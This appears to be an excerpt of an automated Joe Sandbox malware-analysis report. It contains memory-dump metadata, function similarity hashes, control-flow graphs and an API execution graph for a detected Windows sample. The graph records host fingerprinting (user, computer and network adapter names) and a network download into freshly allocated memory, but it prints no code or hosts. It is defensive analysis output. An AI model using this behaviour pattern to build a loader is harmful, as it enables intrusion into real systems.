                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fputcmemset
                                                                      • String ID:
                                                                      • API String ID: 947785774-0
                                                                      • Opcode ID: e35b00e59b905684b8b3c37ce7968cc8b79af77354999ac318f975d91bfacad4
                                                                      • Instruction ID: e8ff2153b9cc1b2cca1b6c0bbe6835fa772361f9eb88024411d452408ca5ccde
                                                                      • Opcode Fuzzy Hash: e35b00e59b905684b8b3c37ce7968cc8b79af77354999ac318f975d91bfacad4
                                                                      • Instruction Fuzzy Hash: 56D10D73B38B418AE7249E7494803FDA691AB04F78FB44235D91D577C4CA3CEA1A8314

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 888 7ff71c8c3430-7ff71c8c3461 889 7ff71c8c3463-7ff71c8c3468 888->889 890 7ff71c8c346e-7ff71c8c3491 call 7ff71c8c2950 888->890 889->890 891 7ff71c8c36d0-7ff71c8c36e2 889->891 894 7ff71c8c34a3-7ff71c8c34a6 890->894 895 7ff71c8c3493-7ff71c8c3496 890->895 891->890 898 7ff71c8c37c0-7ff71c8c37ce 894->898 899 7ff71c8c34ac-7ff71c8c34cd 894->899 896 7ff71c8c3710-7ff71c8c3713 895->896 897 7ff71c8c349c-7ff71c8c34a0 895->897 896->899 897->894 900 7ff71c8c37d4 898->900 901 7ff71c8c354a-7ff71c8c355b memset 898->901 902 7ff71c8c34d0-7ff71c8c34d3 899->902 904 7ff71c8c3566-7ff71c8c3569 900->904 903 7ff71c8c3560-7ff71c8c3563 901->903 905 7ff71c8c3500-7ff71c8c3525 902->905 906 7ff71c8c34d5-7ff71c8c34d8 902->906 903->904 910 7ff71c8c3573-7ff71c8c3575 904->910 911 7ff71c8c356b-7ff71c8c356d 904->911 908 7ff71c8c3530-7ff71c8c3533 905->908 909 7ff71c8c3527-7ff71c8c352d 905->909 906->905 907 7ff71c8c34da-7ff71c8c34df 906->907 907->905 912 7ff71c8c34e1-7ff71c8c34ee 907->912 908->903 913 7ff71c8c3535-7ff71c8c3544 908->913 909->902 915 7ff71c8c35b0-7ff71c8c35b4 910->915 916 7ff71c8c3577-7ff71c8c3584 910->916 911->910 914 7ff71c8c37b2-7ff71c8c37b5 911->914 912->905 917 7ff71c8c34f0-7ff71c8c34f8 912->917 913->901 920 7ff71c8c36f0-7ff71c8c36f3 913->920 921 7ff71c8c36fc-7ff71c8c3703 914->921 918 7ff71c8c3690-7ff71c8c3696 915->918 919 7ff71c8c35ba-7ff71c8c35bf 915->919 916->915 922 7ff71c8c3586-7ff71c8c358c 916->922 917->905 924 7ff71c8c36b0-7ff71c8c36b7 918->924 925 7ff71c8c3698-7ff71c8c36a1 918->925 923 7ff71c8c35c3-7ff71c8c35c6 919->923 920->910 926 7ff71c8c36f9 920->926 921->910 927 7ff71c8c3592-7ff71c8c3595 922->927 928 7ff71c8c3720-7ff71c8c3729 922->928 929 7ff71c8c35e8-7ff71c8c35f2 923->929 930 7ff71c8c35c8 923->930 924->923 931 7ff71c8c36bd-7ff71c8c36c6 924->931 925->923 926->921 932 7ff71c8c372f-7ff71c8c373b 927->932 933 7ff71c8c359b-7ff71c8c35a1 927->933 928->932 928->933 938 7ff71c8c35f4-7ff71c8c35fa 929->938 939 7ff71c8c35fc-7ff71c8c3608 929->939 937 7ff71c8c361d-7ff71c8c3620 930->937 931->923 932->933 934 7ff71c8c3741-7ff71c8c374c 932->934 935 7ff71c8c3778-7ff71c8c3783 933->935 936 7ff71c8c35a7 933->936 934->915 940 7ff71c8c3752-7ff71c8c376f memset 934->940 935->915 941 7ff71c8c3789 935->941 936->915 945 7ff71c8c363c-7ff71c8c3646 937->945 938->939 942 7ff71c8c35da-7ff71c8c35e3 938->942 943 7ff71c8c35d0-7ff71c8c35d7 939->943 944 7ff71c8c360a-7ff71c8c361b fputc 939->944 940->915 948 7ff71c8c3790-7ff71c8c37a8 call 7ff71c8c2ad0 941->948 942->937 949 7ff71c8c35e5 942->949 943->942 944->937 944->949 946 7ff71c8c3678-7ff71c8c3688 945->946 947 7ff71c8c3648-7ff71c8c364e 945->947 950 7ff71c8c3650-7ff71c8c3656 947->950 951 7ff71c8c3658-7ff71c8c365e 947->951 957 7ff71c8c37aa-7ff71c8c37ad 948->957 949->929 950->951 953 7ff71c8c3636-7ff71c8c3639 950->953 954 7ff71c8c3660-7ff71c8c3670 fputc 951->954 955 7ff71c8c3628-7ff71c8c3633 951->955 953->945 954->953 955->953 957->915
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5302ff083d334d4ec2b6ee15df48bd3afbd47665d38e4d7ad72ba528e251c5f1
                                                                      • Instruction ID: 83bf8be388a9d0d40c335f62a4d98974130bb926393a3f9fc7938d2d6a9ff0ab
                                                                      • Opcode Fuzzy Hash: 5302ff083d334d4ec2b6ee15df48bd3afbd47665d38e4d7ad72ba528e251c5f1
                                                                      • Instruction Fuzzy Hash: C091EC72F28B5246E765AF68C0847F9A791AB04F78FA58130CE0C573C4DB3CE95A8758
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: Byte$CharLeadMultiWide
                                                                      • String ID:
                                                                      • API String ID: 2561704868-0
                                                                      • Opcode ID: 83dc216bc8520d6005350d0ddcc0ea1a73efd802d55844d36b42c007fdf00b9f
                                                                      • Instruction ID: efefd6572277d96851e3c8ab6cceeb0c085c1806288553023dc799a24f10f074
                                                                      • Opcode Fuzzy Hash: 83dc216bc8520d6005350d0ddcc0ea1a73efd802d55844d36b42c007fdf00b9f
                                                                      • Instruction Fuzzy Hash: D6310872A1CB8286E360AF65F4803E9B6D0FB907A4FA58134EA88477D4DF3DD458CB14
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-3474627141
                                                                      • Opcode ID: 9b38af0ae7b6fe8fe4a5611bfa1e76cb0f86a688c51365a936f5bc3da82805a1
                                                                      • Instruction ID: fb6d050b2998dadda11c7a3fb068f4c134c08aa4c101b3da508e5dcfa526cc61
                                                                      • Opcode Fuzzy Hash: 9b38af0ae7b6fe8fe4a5611bfa1e76cb0f86a688c51365a936f5bc3da82805a1
                                                                      • Instruction Fuzzy Hash: F101A022D1CF8482D3019F5898801FAB320FB6E758F659325EA8C26165DF28E596C704
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4283191376
                                                                      • Opcode ID: 3a7e04ff68ff461bc54adae239256ee8d9e7739382e5f891c1b00758f4c8fb52
                                                                      • Instruction ID: d33b08119ec19bc95a6101f6eea03f22363b9c0b5f1e1c699fb1fc635c5852b3
                                                                      • Opcode Fuzzy Hash: 3a7e04ff68ff461bc54adae239256ee8d9e7739382e5f891c1b00758f4c8fb52
                                                                      • Instruction Fuzzy Hash: 3AF04F1291CF8882D302AF5CA4400EAB320FB4D798F689325EF8D26155DF28E5968714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2713391170
                                                                      • Opcode ID: db3ac677f1f2c54c2345fb678ade51eb76862a0d2707d25709ee7c64068b4dc1
                                                                      • Instruction ID: 4df37e763f5ef1770b9644d43733a87b8031343e9af31978ebcee6bde73f59f2
                                                                      • Opcode Fuzzy Hash: db3ac677f1f2c54c2345fb678ade51eb76862a0d2707d25709ee7c64068b4dc1
                                                                      • Instruction Fuzzy Hash: FCF06212D1CF8882D302AF5CA4400EBB330FF4DB98F685325EF8D26155DF28E5968714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2187435201
                                                                      • Opcode ID: 0dced1c727ef90fbbd92c9dce7bdcc55e6a2092160eaf33fabd7ff2435923f73
                                                                      • Instruction ID: d05036d45a01c569894649f3e17b41c17b6094d1ca3377eb1e5035063147be34
                                                                      • Opcode Fuzzy Hash: 0dced1c727ef90fbbd92c9dce7bdcc55e6a2092160eaf33fabd7ff2435923f73
                                                                      • Instruction Fuzzy Hash: B2F06222D1CF8882D302AF5CA4400EBB330FF4D798F685325EF8D26155DF28E5968714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4064033741
                                                                      • Opcode ID: a06668e6d3fce080e45a48d8ec67e54a60e55eea52cb01d9b7bef504bb2c86f2
                                                                      • Instruction ID: fd041e01061b4783ae42af1dc09d53b7706763644dec198bd28bc742e6870f81
                                                                      • Opcode Fuzzy Hash: a06668e6d3fce080e45a48d8ec67e54a60e55eea52cb01d9b7bef504bb2c86f2
                                                                      • Instruction Fuzzy Hash: 58F04F1291CF8882D302AF5CA4400EAB320FB5D798F685325EF8D26555DF28E5968714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-4273532761
                                                                      • Opcode ID: b773b55875b88ab2c3d8e57f9be057c5620b53852a9d17090990b4a6717721ec
                                                                      • Instruction ID: 13415a5a6bfb23c6c34231dc1c546e310b5ee36d66927afcb97aced552b1c59e
                                                                      • Opcode Fuzzy Hash: b773b55875b88ab2c3d8e57f9be057c5620b53852a9d17090990b4a6717721ec
                                                                      • Instruction Fuzzy Hash: 90F06212D1CF8882D302AF5CA4400EBB330FF4D798F689325EF8D26555DF29E5968714
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1817202590.00007FF71C8C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C8C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1817161086.00007FF71C8C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817252100.00007FF71C8CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817264618.00007FF71C8CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8D1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1817279257.00007FF71C8E6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff71c8c0000_SecuriteInfo.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2468659920
                                                                      • Opcode ID: 43ab06d8bb0e13efae59bfc5cb7a6822e2696801d94299209a41bb19ce347428
                                                                      • Instruction ID: 1963dd204765d7c10fbeeb94ddb7b229a05da97f9fb9fbe49a2c87522fb9b163
                                                                      • Opcode Fuzzy Hash: 43ab06d8bb0e13efae59bfc5cb7a6822e2696801d94299209a41bb19ce347428
                                                                      • Instruction Fuzzy Hash: E3F09616C18F8882D302AF5CA4400EBB330FF5D798F645325EF8C2A155DF29E596C714

                                                                      Execution Graph

                                                                      Execution Coverage:0.8%
                                                                      Dynamic/Decrypted Code Coverage:45.2%
                                                                      Signature Coverage:17.7%
                                                                      Total number of Nodes:186
                                                                      Total number of Limit Nodes:14
                                                                      execution_graph 83155 7ff72bcd13f0 83158 7ff72bcd1180 83155->83158 83157 7ff72bcd1406 83159 7ff72bcd11b0 83158->83159 83160 7ff72bcd11b9 Sleep 83159->83160 83161 7ff72bcd11cd 83159->83161 83160->83159 83162 7ff72bcd1200 83161->83162 83163 7ff72bcd134c _initterm 83161->83163 83167 7ff72bcd12ee 83161->83167 83176 7ff72bd6af00 83162->83176 83163->83162 83165 7ff72bcd1228 SetUnhandledExceptionFilter 83166 7ff72bcd124b 83165->83166 83169 7ff72bcd1250 malloc 83166->83169 83168 7ff72bcd1180 85 API calls 83167->83168 83175 7ff72bcd1302 83167->83175 83170 7ff72bcd13e6 83168->83170 83169->83167 83171 7ff72bcd127a 83169->83171 83170->83157 83172 7ff72bcd1280 strlen malloc memcpy 83171->83172 83172->83172 83173 7ff72bcd12b2 83172->83173 83193 7ff72bcd1ec0 83173->83193 83175->83157 83177 7ff72bd6af21 83176->83177 83187 7ff72bd6af38 83176->83187 83177->83165 83178 7ff72bd6b210 83178->83177 83179 7ff72bd6b219 83178->83179 83184 7ff72bd6b23d 83179->83184 83198 7ff72bd6ad90 8 API calls 83179->83198 83180 7ff72bd6b250 83200 7ff72bd6ad20 8 API calls 83180->83200 83183 7ff72bd6b25c 83183->83165 83199 7ff72bd6ad20 8 API calls 83184->83199 83185 7ff72bd6ad90 8 API calls 83191 7ff72bd6b01e 83185->83191 83187->83177 83187->83178 83187->83180 83187->83184 83190 7ff72bd6b110 83187->83190 83187->83191 83188 7ff72bd6b10a 83188->83190 83190->83177 83192 7ff72bd6b142 VirtualProtect 83190->83192 83191->83185 83191->83187 83191->83188 83197 7ff72bd6ad20 8 API calls 83191->83197 83192->83190 83194 7ff72bcd1ed7 83193->83194 83201 7ff72bcf4520 83194->83201 83197->83191 83198->83179 83199->83180 83200->83183 83202 7ff72bcf4541 83201->83202 83203 7ff72bcf4556 SetThreadDescription 83202->83203 83212 7ff72bcf5180 83203->83212 83209 7ff72bcd1efd 83209->83167 83247 7ff72bd4ae40 83212->83247 83215 7ff72bcf51c1 83216 7ff72bcf5233 83215->83216 83217 7ff72bcf51c9 83215->83217 83268 7ff72bd45a8f 69 API calls 83216->83268 83220 7ff72bcf457b 83217->83220 83269 7ff72bcf4fe0 69 API calls 83217->83269 83227 7ff72bcf4960 83220->83227 83221 7ff72bcf523e 83270 7ff72bd6a710 6 API calls 83221->83270 83272 7ff72bd28780 83227->83272 83229 7ff72bcf4990 83230 7ff72bcf4995 83229->83230 83231 7ff72bcf49d8 83229->83231 83232 7ff72bcf4a0f 83230->83232 83233 7ff72bcf499b 83230->83233 83300 7ff72bd53f30 69 API calls 83231->83300 83301 7ff72bd01ae0 69 API calls 83232->83301 83287 7ff72bd28690 83233->83287 83237 7ff72bcf49b7 83238 7ff72bcf4583 83237->83238 83302 7ff72bd53850 69 API calls 83237->83302 83243 7ff72bcd1450 83238->83243 83241 7ff72bcf4a7a 83303 7ff72bd6a710 6 API calls 83241->83303 83311 7ff72bcd1470 83243->83311 83246 7ff72bd218d0 WaitOnAddress GetLastError WaitOnAddress GetLastError WakeByAddressAll 83246->83209 83248 7ff72bd4ae8b 83247->83248 83249 7ff72bcf51a1 83247->83249 83271 7ff72bd53f30 69 API calls 83248->83271 83249->83215 83267 7ff72bcd1f10 GetProcessHeap HeapAlloc 83249->83267 83267->83215 83268->83221 83273 7ff72bd2879e TlsGetValue 83272->83273 83274 7ff72bd28852 83272->83274 83275 7ff72bd287cd 83273->83275 83276 7ff72bd287b1 83273->83276 83305 7ff72bd22190 69 API calls 83274->83305 83275->83229 83276->83275 83304 7ff72bcd1f10 GetProcessHeap HeapAlloc 83276->83304 83278 7ff72bd2885e TlsGetValue 83278->83275 83278->83276 83280 7ff72bd287f3 83281 7ff72bd287f8 TlsGetValue TlsSetValue 83280->83281 83282 7ff72bd28873 83280->83282 83281->83275 83306 7ff72bd45a8f 69 API calls 83282->83306 83284 7ff72bd28882 83307 7ff72bd6a710 6 API calls 83284->83307 83288 7ff72bd286ae TlsGetValue 83287->83288 83289 7ff72bd28741 83287->83289 83292 7ff72bd286bd 83288->83292 83297 7ff72bd286d9 83288->83297 83309 7ff72bd22190 69 API calls 83289->83309 83291 7ff72bd2874d TlsGetValue 83291->83292 83291->83297 83292->83297 83308 7ff72bcd1f10 GetProcessHeap HeapAlloc 83292->83308 83294 7ff72bd286f8 83295 7ff72bd286fd TlsGetValue TlsSetValue 83294->83295 83296 7ff72bd28762 83294->83296 83295->83297 83310 7ff72bd45a8f 69 API calls 83296->83310 83297->83237 83299 7ff72bd28771 83301->83237 83302->83241 83304->83280 83305->83278 83306->83284 83308->83294 83309->83291 83310->83299 83314 7ff72bcd14a0 83311->83314 83312 7ff72bcd145c 83312->83209 83312->83246 83315 7ff72bcd14a9 83314->83315 83316 7ff72bcd1eab WaitForSingleObject 83315->83316 83316->83312 83317 1ff24f99d1b 83318 1ff24f99d38 83317->83318 83343 1ff24fa3830 83318->83343 83323 1ff24fa4310 NtAddBootEntry 83324 1ff24f9a468 83323->83324 83325 1ff24fa4310 NtAddBootEntry 83324->83325 83329 1ff24f9a5fa 83324->83329 83326 1ff24f9a49c 83325->83326 83327 1ff24fa4310 NtAddBootEntry 83326->83327 83326->83329 83328 1ff24f9a4d0 83327->83328 83328->83329 83330 1ff24fa4310 NtAddBootEntry 83328->83330 83332 1ff24f9a777 83329->83332 83347 1ff24fa48a0 83329->83347 83333 1ff24f9a4ff 83330->83333 83333->83329 83334 1ff24fa4310 NtAddBootEntry 83333->83334 83335 1ff24f9a535 83334->83335 83335->83329 83336 1ff24fa4310 NtAddBootEntry 83335->83336 83337 1ff24f9a566 83336->83337 83337->83329 83338 1ff24fa4310 NtAddBootEntry 83337->83338 83339 1ff24f9a595 83338->83339 83339->83329 83340 1ff24fa4310 NtAddBootEntry 83339->83340 83341 1ff24f9a5c6 83340->83341 83341->83329 83342 1ff24fa4310 NtAddBootEntry 83341->83342 83342->83329 83344 1ff24f99f39 83343->83344 83345 1ff24fa3876 83343->83345 83344->83329 83351 1ff24fa4310 83344->83351 83345->83344 83346 1ff24fa38e9 NtAddBootEntry 83345->83346 83346->83344 83348 1ff24fa490f 83347->83348 83349 1ff24fa48ce 83347->83349 83348->83332 83349->83348 83350 1ff24fa490d NtAddBootEntry 83349->83350 83350->83348 83352 1ff24f9a439 83351->83352 83353 1ff24fa4347 83351->83353 83352->83323 83352->83329 83353->83352 83354 1ff24fa43a1 NtAddBootEntry 83353->83354 83354->83352 83355 1ff24f97d70 83362 1ff24f97da1 83355->83362 83356 1ff24f97f52 GetUserNameA 83357 1ff24f97f70 83356->83357 83358 1ff24f97ff3 GetComputerNameExA 83357->83358 83359 1ff24f98016 83358->83359 83364 1ff24f9805b 83358->83364 83361 1ff24f98034 GetComputerNameExA 83359->83361 83359->83364 83360 1ff24f9809e GetAdaptersInfo 83363 1ff24f980bc 83360->83363 83366 1ff24f980f1 83360->83366 83361->83364 83362->83356 83365 1ff24f980da GetAdaptersInfo 83363->83365 83363->83366 83364->83360 83365->83366 83369 1ff24f90cc0 NtAddBootEntry 83366->83369 83368 1ff24f981ae 83369->83368 83370 1ff24fa1ed0 83371 1ff24fa1edc 83370->83371 83372 1ff24fa1f17 83371->83372 83373 1ff24fa1f0a 83371->83373 83377 1ff24fa1f94 83371->83377 83375 1ff24fa1f4d CreateFiberEx 83372->83375 83372->83377 83373->83377 83379 1ff24fa4eb0 NtAddBootEntry 83373->83379 83376 1ff24fa1f79 DeleteFiber 83375->83376 83375->83377 83376->83377 83379->83377 83384 1ff24f9d510 83385 1ff24f9d540 83384->83385 83387 1ff24f9d546 83384->83387 83386 1ff24f9d617 LdrGetProcedureAddress 83385->83386 83385->83387 83386->83387 83392 1ff24fa36f0 83393 1ff24fa37ec 83392->83393 83394 1ff24fa3763 83392->83394 83394->83393 83395 1ff24fa37ea NtAddBootEntry 83394->83395 83395->83393 83400 1ff24fa6a20 83403 1ff24f9b740 83400->83403 83402 1ff24fa6a5e 83410 1ff24fa5dc0 83403->83410 83407 1ff24fa5dc0 NtAddBootEntry 83408 1ff24f9bd59 83407->83408 83408->83402 83409 1ff24f9b7db 83409->83407 83411 1ff24f9b7c3 83410->83411 83412 1ff24fa5dda 83410->83412 83411->83409 83414 1ff24f92a60 NtAddBootEntry 83411->83414 83412->83411 83415 1ff24fa2df0 NtAddBootEntry 83412->83415 83414->83409 83415->83411 83416 1ff22f90366 83417 1ff22f90375 LoadLibraryA InternetOpenA 83416->83417 83420 1ff22f903b2 InternetConnectA 83417->83420 83425 1ff22f9044e 83420->83425 83422 1ff22f903d6 83423 1ff22f904ef VirtualAlloc InternetReadFile 83422->83423 83423->83422 83424 1ff22f903a3 83423->83424 83426 1ff22f90456 83425->83426 83427 1ff22f904ef VirtualAlloc InternetReadFile 83426->83427 83427->83426 83428 1ff22f9053b 83427->83428 83428->83422

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
